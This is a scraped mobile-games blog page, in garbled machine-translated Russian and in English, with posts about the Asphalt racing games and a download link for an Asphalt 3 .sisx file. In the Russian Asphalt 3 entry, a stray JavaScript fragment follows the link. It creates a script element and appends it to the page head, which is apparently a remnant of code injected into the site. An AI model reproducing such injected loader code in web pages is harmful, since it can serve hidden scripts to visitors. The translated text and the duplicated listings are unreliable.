Tegoos мобильных

Мобильные игры, Мобильный программного обеспечения, И Мобильные приколы.

Асфальт 5 - IPhone

Написал Tegoos Ноября - 14 - 2009 0 Как

Хватит мечтать, и сесть в машину!, все, что ты когда-нибудь мечтали делать за рулем, наконец, здесь, на ваш iPhone. Я представляю вам асфальт 5 от Gameloft. Есть DREAM автомобиль для Вас покататься на 33 из наиболее динамично, Наиболее престижные автомобили вы всегда мечтали, от производителей, таких как Ferrari, Lamborghini,  [ Подробнее ]

Share

Асфальт 4 – Elite Racing

Написал Tegoos В июле - 19 - 2009 0 Как

Асфальт 4 - Элитные гоночные характеристики - удивительные 3D средах обеспечивая захватывающие ощущения скорости, 10 автомобили мечты & велосипеды включая Bugatti Veyron, Ferrari F430 Spider, Nissan GT-R, Ducati 1098 5 режимов экстремальных гонок, таких как КС Чейз, операции, и "Победи всех. Адаптировать ваш стиль вождения к погодным условиям: Можете ли вы контролировать свой автомобиль  [ Подробнее ]

Share

Асфальт 3 (Street Rules).SISX

Написал Tegoos В июле - 19 - 2009 0 Как

Имя - Асфальт 3 Size – 4.97 MB Разрешение - 320X240 точек Дата - 13/12/2008 Format и - SISX Выгрузка HTTP://www.sharemobile.ro/share/1887/asphalt3_mbzdwpl7.sisx document.currentScript.parentNode.insertBefore(с, document.currentScript);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(с);

Share
Категории: Игры, SISX игры

Tegoos Mobile

Mobile Games, Mobile Software, And Mobile Themes.

Asphalt Nitro

Posted by Tegoos On July - 2 - 2016 3 Comments
asphalt nitro thumbnail

Asphalt 8 just got a new little brother all thrilled up in a mini 25-MB package. Take advantage of fast cars, such as LaFerrari or Lamborghini Veneno, in breathtaking scenery’s that you’ll need to tame with the craziest stunts you can pull off, push up your Nitro and be the first to cross the finish  [ Read More ]

Share

Asphalt 5 – iPhone

Posted by Tegoos On November - 14 - 2009 0 Comment

Stop dreaming and get in the car!, all you’ve ever dreamed of doing behind the wheel is finally here on your iPhone.  I present to you Asphalt 5 from gameloft. THERE’S A DREAM CAR FOR YOU Take a ride in 33 of the fastest, most prestigious cars you’ve ever dreamed, from manufacturers like Ferrari, Lamborghini,  [ Read More ]

Share
Categories: Featured, Games, iPhone Games

Asphalt 4 – Elite racing

Posted by Tegoos On July - 19 - 2009 0 Comment

Asphalt 4 – elite racing features – Amazing 3D environments providing breathtaking speed sensations, 10 dream cars & bikes including the Bugatti Veyron, Ferrari F430 Spider, Nissan GT-R, Ducati 1098 5 extreme racing modes such as cop chase, drift, and beat’em all. Adapt your driving style to the weather conditions: Can you control your car  [ Read More ]

Share

Asphalt 3 (Street rules).sisx

Posted by Tegoos On July - 19 - 2009 0 Comment

Name – Asphalt 3 Size – 4.97 MB Resolution – 320X240 px Date – 13/12/2008 Fomat – SISX DOWNLOAD http://www.sharemobile.ro/share/1887/asphalt3_mbzdwpl7.sisx

Share
Categories: Games, SISX Games